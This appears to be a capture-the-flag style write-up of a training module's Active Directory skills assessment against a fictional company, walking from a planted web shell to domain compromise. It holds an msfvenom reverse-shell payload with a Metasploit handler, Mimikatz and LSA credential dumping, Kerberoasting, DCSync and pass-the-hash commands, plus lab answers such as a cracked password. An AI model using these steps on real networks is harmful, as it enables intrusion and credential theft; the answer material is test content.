AD Enumeration & Attacks - Skills Assessment Part I
The Scenario
A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.
Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.
Write Up
We first start by logging into the webshell provided, once in we proceed to download the file C:\Windows\Users\Administrator\Desktop\flag.txt
Next, we enumerate all the SPNs and dump all available tickets with setspn.exe -Q */*
I then tried to upload Mimikatz, which worked fine but when I came to run it the webshell hung
The solution was to create a more stable reverse shell from my attacking host.
First thing is to upload a msfvenom payload then ran it on the webshell while on my attack host I opened msfconsole and connected to the payload and thus had a reverse shell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> -f exe -o backupscript.exe LPORT=8080use exploit/muti/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport 8080
runNow we can run Mimikatz and dump the hashes
We then prepare the hash and feed it into hashcat, we get a hit lucky7
We can now connect to the host MS01 with Enter-PSSession and once in we can dump the flag on the administrator account
Our next job is to find a cleartext password on the new domain. We will need to create a pivot to do this
We can use Metasploit's auto route and socks proxy for this, make sure to add we check our proxychain.conf file has been set correctly with the following line for socks4/socks5
Now we can netxec (formally crackmapexec) and dump the users and hashes for the LSA
sudo proxychains netexec smb 172.16.6.50 -u svc_sql -p lucky7 --lsa
We can see from the output we now have a username and in this case a cleartext password!
We can now see from scans that the user tpetty has ability to perform a DCSync attack so we can abuse this gain access to the next Domain
This dumped the administrator hash
We can now use this hash to perform a PTH attack with any chosen tool, I decided to go for evil-winrm
With a shell on the system, we can go ahead and complete our last task and dump the flag!
-----
Questions
Submit the contents of the flag.txt file on the administrator Desktop of the web server
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
Crack the account's password. Submit the cleartext value.
Submit the contents of the flag.txt file on the Administrator desktop on MS01
Find cleartext credentials for another domain user. Submit the username as your answer.
Submit this user's cleartext password.
What attack can this user perform?
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
Last updated
Was this helpful?